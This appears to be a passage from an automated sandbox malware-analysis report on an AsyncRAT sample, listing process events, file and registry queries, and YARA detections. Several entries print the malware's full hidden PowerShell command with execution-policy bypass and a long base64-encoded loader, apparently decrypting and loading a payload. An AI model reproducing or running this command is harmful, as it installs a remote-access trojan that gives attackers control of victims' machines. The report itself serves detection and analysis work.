0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkdnd0c3cuq29wevrvkcricmvndyk7csr2d3rzdy5eaxnwb3nlkck7csrqewhpec5eaxnwb3nlkck7csricmvndy5eaxnwb3nlkck7csricmvndy5ub0fycmf5kck7fwz1bmn0aw9uihpnd3d3kcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyriewf3ad1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgvhyxnzpsriewf3ac5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrlywfzcy5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jgdzzia9icrlbny6vvnfuk5btuu7jhbndndsid0gj0m6xfvzzxjzxccgkyakz3nmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakcgd2d2w7jgntdgt0pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibrzgf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygntwrnu20vqurpdmu2bwfpr0ivnhvly1nunct5ctlmcdnschratkz4afbsbz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnumfncfvzrkg0t1v2l3r0nwowbedwzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibpbgd5zsgkcgfyyw1fdmfykxsjsuvyicckanloaxg9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckynjlz3c9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyr2d3rzdz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrqewhpecwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkdnd0c3cuq29wevrvkcricmvndyk7csr2d3rzdy5eaxnwb3nlkck7csrqewhpec5eaxnwb3nlkck7csricmvndy5eaxnwb3nlkck7csricmvndy5ub0fycmf5kck7fwz1bmn0aw9uihpnd3d3kcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyriewf3ad1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgvhyxnzpsriewf3ac5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrlywfzcy5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jgdzzia9icrlbny6vvnfuk5btuu7jhbndndsid0gj0m6xfvzzxjzxccgkyakz3nmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakcgd2d2w7jgntdgt0pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibrzgf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygntwrnu20vqurpdmu2bwfpr0ivnhvly1nunct5ctlmcdnschratkz4afbsbz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnumfncfvzrkg0t1v2l3r0nwowbedwzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibpbgd5zsgkcgfyyw1fdmfykxsjsuvyicckanloaxg9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckynjlz3c9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyr2d3rzdz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrqewhpecwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkdnd0c3cuq29wevrvkcricmvndyk7csr2d3rzdy5eaxnwb3nlkck7csrqewhpec5eaxnwb3nlkck7csricmvndy5eaxnwb3nlkck7csricmvndy5ub0fycmf5kck7fwz1bmn0aw9uihpnd3d3kcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyriewf3ad1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgvhyxnzpsriewf3ac5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrlywfzcy5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jgdzzia9icrlbny6vvnfuk5btuu7jhbndndsid0gj0m6xfvzzxjzxccgkyakz3nmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakcgd2d2w7jgntdgt0pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibrzgf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygntwrnu20vqurpdmu2bwfpr0ivnhvly1nunct5ctlmcdnschratkz4afbsbz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnumfncfvzrkg0t1v2l3r0nwowbedwzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibpbgd5zsgkcgfyyw1fdmfykxsjsuvyicckanloaxg9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckynjlz3c9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyr2d3rzdz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrqewhpecwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkdnd0c3cuq29wevrvkcricmvndyk7csr2d3rzdy5eaxnwb3nlkck7csrqewhpec5eaxnwb3nlkck7csricmvndy5eaxnwb3nlkck7csricmvndy5ub0fycmf5kck7fwz1bmn0aw9uihpnd3d3kcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyriewf3ad1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgvhyxnzpsriewf3ac5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrlywfzcy5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jgdzzia9icrlbny6vvnfuk5btuu7jhbndndsid0gj0m6xfvzzxjzxccgkyakz3nmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakcgd2d2w7jgntdgt0pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\LogonUI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Windows\System32\LogonUI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Yara detected AsyncRAT
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPE
